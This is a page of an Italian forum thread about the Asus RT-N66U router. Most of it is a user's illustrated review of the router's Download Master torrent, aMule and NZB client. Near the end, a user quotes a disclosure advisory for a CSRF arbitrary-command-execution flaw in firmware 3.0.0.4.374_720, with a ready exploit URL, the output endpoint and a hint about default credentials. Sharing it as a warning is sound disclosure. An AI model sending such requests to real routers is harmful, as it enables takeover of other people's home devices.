+ Rispondi
Pagina 5 di 12 PrimaPrima ... 3 4 5 6 7 ... UltimaUltima
Risultati da 41 a 50 su 120

Discussione: Asus RT-N66U

Iscritto dal
    17/10/2011
    Quote Originariamente inviato da ATIX Visualizza il messaggio
    Non ho capito il discorso delle interferenze
    Intendi con le reti dei vicini? Col digitale non vedo che problema possa esserci.

Poi certo...spero tu abbia un client almeno 2x2 stream perchè se devi prendere un 66U per usarlo su un portatile a 54Mbit mi fai incazzare

@main: linkami qualcosa.
    Nel senso che, almeno col tecnicolor di adesso(), i canali si vedono a quadrettoni e solo pochi si vedono bene, ma se spengo il tecnicolor i canali si vedono senza nessun problema!

Oltre a farti incazzare ti faccio spuntare i calci nei piedi mi sa Per il momento l'acquisto era spinto dal fatto di poter usare i client del firmware del router come muletto
    Hardware:
    I7 4930k - Rampage IV Extreme
    - 32gb Corsair Dominator Platinum 2133MHz CL9 - ASUS ROG GTX 780 Poseidon Platinum - Samsung 840 EVO 500 - WD Caviar Black 500gb - Thermaltak Toughpower 1500W - Banchetto Tecnofront HWD - BenQ XL2410T - R.A.T.7 - Razer BlackWidow

Iscritto dal
    24/11/2012
    Guarda, è un muletto strozzato. Cioè qualcosa lo scarichi ma non pensare di mettere 3 servizi a scaricare più file per volta (torrent+ed2k+direct_down).
    Non voglio che spendi soldi per poi rimanere deluso.

Life is short, play more.
    3770K - Z77 extreme4 - 8G Samsung green 30nm - 6950@70 - M4 128G
    DGN3500 (amod) + R7000 (kongac)

Iscritto dal
    17/10/2011
    Quote Originariamente inviato da ATIX Visualizza il messaggio
    Guarda, è un muletto strozzato. Cioè qualcosa lo scarichi ma non pensare di mettere 3 servizi a scaricare più file per volta (torrent+ed2k+direct_down).
    Non voglio che spendi soldi per poi rimanere deluso.
    Ottimo grazie della dritta Vedo di andare su qualche altra cosa più sicura
    Hardware:
    - 32gb Corsair Dominator Platinum 2133MHz CL9 - ASUS ROG GTX 780 Poseidon Platinum - Samsung 840 EVO 500 - WD Caviar Black 500gb - Thermaltak Toughpower 1500W - Banchetto Tecnofront HWD - BenQ XL2410T - R.A.T.7 - Razer BlackWidow

Iscritto dal
    26/05/2011
    Vista la grande richiesta () ilustro la questione Download Master

Fatto il login, vado nella sezione USB Application sulla sinistra

Asus RT-N66U-rtn66u-usbapp.png

Non c'è collegato nessun disco USB e quando clicco sul Download Master me lo fa notare;
    Nessun problema, collego un disco (che riconosce da solo senza bisogno di refresh né altro) e vede che non è mai stato usato col router

Asus RT-N66U-rtn66u-selectdisk.png

Clicco sopra l'icona del disco fisso e installa ciò che ha bisogno di installare

Asus RT-N66U-rtn66u-installing.png

Asus RT-N66U-rtn66u-installcomplete.png

Clicco il link giallo, mi chiede nuovamente di fare il login al router per sicurezza e mi trovo nel Download Master.
    Vuoto per il momento, vediamo le impostazioni possibili:

Asus RT-N66U-rtn66u-downloadmaster.png

Nelle impostazioni generali si scopre che possiamo specificare quando scaricare (per esempio solo durante la notte) e che è possibile accedere al download master direttamente anche sulla porta 8081 (sia dalla LAN che dalla WAN, se si attiva l'opzione corrispondente).
    O almeno, credo che sia quello, le diciture dicono "time to enable Radio", come se intendesse uno scheduler per l'attivazione/disattivazione della wireless... ritengo sia un errore di traduzione/svista

Naturalmente si può anche scegliere dove salvare i file all'interno del disco USB, non è però possibile separarli in base al protocollo.

Asus RT-N66U-rtn66u-dmgeneralsettings.png

Le impostazioni per Bittorrent sono del tutto standard, niente di nuovo sotto il sole.

Asus RT-N66U-rtn66u-dmbittorrentsettings.png

NZB è un client per scaricare i binari su Usenet, metodo presente ma per niente diffuso dalle nostre parti

Asus RT-N66U-rtn66u-dmnzbsettings.png

Le impostazioni di aMule sono... scarsine () ma vediamo meglio dopo se comporta disagi particolari oppure no.

Asus RT-N66U-rtn66u-dmamulesettings.png
    Ultima modifica: 30-09-2013 alle 09:50, di MainThink
    Verità #10 | Viva l'unto, reale o presunto

Iscritto dal
    24/11/2012
    Bene. Grazie

Life is short, play more.
    3770K - Z77 extreme4 - 8G Samsung green 30nm - 6950@70 - M4 128G
    DGN3500 (amod) + R7000 (kongac)

Iscritto dal
    26/05/2011
    Usando il tasto Add possiamo aggiungere tutti i task che vogliamo, ne ho messi quattro diversi come esempio: un .torrent, un ed2k, un magnet di un torrent e un download http

Asus RT-N66U-rtn66u-dmadded2k.png

Asus RT-N66U-rtn66u-dmaddhttp.png

Sono partiti tutti contemporaneamente, il download HTTP si è trovato avvantaggiato perché aveva campo libero mentre gli altri si connettevano ai peer e ha finito in un lampo a banda piena
    Cliccando sul pallino "i" di informazione su qualsiasi task possiamo vedere qualche dato in più sul download selezionato.

Asus RT-N66U-rtn66u-dmrunning.png

Sono abbastanza convinto che il traffico del Download Manager abbia priorità secondaria rispetto al traffico WAN-LAN perché i client sul mio pc (navigazione web compresa) non mostrano segni di rallentamento alcuno.
    Una cosa è certa, l'hardware del router fa un pochettino fatica a restare snello e svelto nella navigazione dell'interfaccia quando sotto ci sono decine di connessioni TCP ai peer... ci vuole una certa fetta di pazienza in più per passare da una pagina all'altra.
    Pensiamola come l'essere abituati a navigare su internet a 20 megabit e di colpo ci troviamo con una connessione a 5 megabit

Interessante comunque notare che scarica contemporaneamente con client diversi (non che sia una grande sorpresa), vediamo cosa succede se imposto dei limiti alle velocità (2048 KB down, 500 KB up) e connessioni (150 globali, 30 per download) al client bittorrent, e allungo drasticamente la coda...

Si scopre che il limite di download contemporanei è 10 e si direbbe che non può essere cambiato dall'utente.
    Si scopre anche che ci deve essere qualche tipo di limite ulteriore, voluto o risultato di un bug non saprei, perché il download massimo si ferma a 1536 KB/s indipendentemente dal limite impostato (o disattivato).
    Ha sicuramente a che fare col client bittorrent perché nell'esempio prima, il file HTTP l'ha scaricato a quasi 9MB/s precisi.

Con una coda lunga e 10 download in corso, il refresh automatico della pagina ogni cinque secondi è irragionevole, ci impiega ben più di cinque secondi a fornirmi la pagina e le richieste si accumulano.
    L'ho aumentato a 30 secondi e in effetti funziona meglio, nel senso che perlomeno fa davvero un refresh ogni 30 secondi.

La gestione della coda vera e propria la definirei del tutto fallimentare () dopo diversi minuti mi aspetterei dieci download con una quindicina di peer ciascuno e velocità ragionevolmente uguali per tutti.
    Invece la situazione è che un magnet è fermo all'inizio, un download è fortemente preferito e tutti gli altri sono lasciati un po' lì a cavarsela da soli per quanto possono.
    Aggiungo che le velocità sia di download che di upload sono tutt'altro che costanti.

Chiaramente tutti quei torrent hanno migliaia di seed quindi è proprio colpa del client.

Asus RT-N66U-rtn66u-dmqueue.png

Conclusione? Le uniche due situazioni in cui userei questo router come muletto per scaricare sono a) in caso di impellente emergenza o b) impostando lo scaricamento nelle ore notturne perché tanto dormo e non possono venirmi i pugni nelle mani (a meno di sognare di essere a lavorare col Download Master)

L'idea è buona ma l'hardware del router e l'implementazione del client... falliscono.

ps: ho fatto un esempio caricando il client bittorrent, sono sicuro che la situazione con aMule sia uguale se non peggiore

ps2: ho ancora i firmware originali (non sono gli ultimi disponibili), mi interessava lasciarli per un po' così da valutare le eventuali migliorie a 360°.
    Ripeterò volentieri anche questo test una volta installata l'ultima versione del firmware
    Ultima modifica: 30-09-2013 alle 09:58, di MainThink

Iscritto dal
    17/10/2011
    Ottimo Main! Non potevo chiedere di meglio (Se mi capita tra le mani ti spedirò un barattolo di marmellata di salsiccia)
    Hardware:

Iscritto dal
    09/11/2011
    Oggi mi è arrivato questo avviso:

Asus RT-N66U 3.0.0.4.374_720 - CSRF Vulnerability [Anonymoused]
    2013-09-30 19:05:06

Exploit Title: CSRF Asus RT-N66U Arbitrary Command Execution
    Google Dork: N.A.
    Date: 30 September 2013
    Exploit Author: cgcai (https://www.qxcg.net/arbitrary-comma...us-rtn66u.html)
    Vendor Homepage: RT-N66U - Networking - ASUS
    Software Link: RT-N66U - Networking - ASUS
    Version: 3.0.0.4.374_720
    Tested on: N.A.
    CVE: Pending

Description:
    The Asus RT-N66U is a home wireless router. Its web application has a CSRF vulnerability that allows an attacker to execute arbitrary commands on the target device.

Exploitable URL:
    The parameter "SystemCmd" in the URL below causes the device to execute arbitrary commands. (The value encoded in the example is `nvram show`)

http://192.168.1.1/apply.cgi?current_page=Main_Analysis_Content.asp&n ext_page=cmdRet_check.htm&next_host=192.168.1.1&gr oup_id=&modified=0&action_mode=+Refresh+&action_sc ript=&action_wait=&first_time=&preferred_lang=EN&S ystemCmd=nvram show&firmver=3.0.0.4&cmdMethod=ping&destIP=www.goo gle.com&pingCNT=5

The URL should be submitted as a `GET` request.

Console output can be observed by sending a `GET` request to `http://192.168.1.1/cmdRet_check.htm` after calling the URL above, if so desired.

The URLs above are protected with HTTP Basic Access Authentication. If a victim has logged in to the router recently, the exploit will work without further intervention. Otherwise, attackers can try supplying default credenitals in the URL.

Iscritto dal
    26/05/2011
    Se uno lascia nome utente e password di default per il login al router, e non fa logout quando ha finito di usare l'interfaccia... si merita questo e altro

Iscritto dal
    05/09/2011
    da dove è arrivato?

+ Rispondi
Pagina 5 di 12 PrimaPrima ... 3 4 5 6 7 ... UltimaUltima

Autorizzazioni